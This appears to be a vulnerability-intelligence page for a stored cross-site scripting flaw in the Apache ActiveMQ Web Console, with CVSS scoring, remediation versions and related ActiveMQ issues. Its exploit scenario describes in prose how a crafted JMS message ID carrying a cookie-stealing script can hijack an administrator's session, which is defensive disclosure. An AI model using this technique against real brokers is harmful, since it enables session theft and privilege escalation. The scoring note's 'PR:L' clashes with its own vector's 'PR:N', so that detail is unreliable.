GHSA-j548-68g5-9j7x
Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Producer authentication requires PR:L; admin must browse queue so UI:R; XSS executes in admin browser changing scope S:C with limited session-level C and I impact.
Primary rating from Vendor (CNA).
CVSS VectorVendor
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
4Description PRE-NVD
Articles & Coverage 3
AnalysisAI
Stored cross-site scripting in Apache ActiveMQ Web Console allows an authenticated message producer to inject malicious JavaScript via a crafted JMS message ID, which executes in the browser of any administrator who browses the affected queue. The browse page renders message IDs without HTML sanitization, enabling privilege escalation from producer to administrator via session hijacking or credential theft. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The attacker must hold authenticated credentials as a JMS message producer with write access to at least one queue on the target broker - unauthenticated exploitation is not possible. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No CVSS vector was published by NVD at time of analysis, so all metric assessments are independently derived from the description. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with valid message-producer credentials connects to the ActiveMQ broker and publishes a message whose JMS message ID is set to a value containing an HTML script tag with JavaScript (e.g., a session-stealing payload targeting document.cookie). The malicious message ID is stored in the broker. … |
| Remediation | Upgrade to Apache ActiveMQ 6.2.7 (for 6.x deployments) or 5.19.8 (for 5.x deployments), both released June 29, 2026 and confirmed as the official fixes by the Apache advisory at https://activemq.apache.org/. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: inventory all ActiveMQ Web Console instances; audit and list all message producer accounts with active credentials. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Memory Allocation with Excessive Size Value vulnerability in Apache ActiveMQ. Rated medium severity (CVSS 6.9), this vul
Remote code execution in Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ (versions before 5.19.7 and 6.0.0 before 6.2
Denial of service in Apache ActiveMQ (versions before 5.19.8, and 6.0.0 before 6.2.7) lets an authenticated user crash t
Unbounded heap consumption in Apache ActiveMQ's STOMP NIO codec allows an unauthenticated remote client to crash the bro
Unauthorized message consumption in Apache ActiveMQ Classic lets a connected client read from temporary destinations bel
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-40279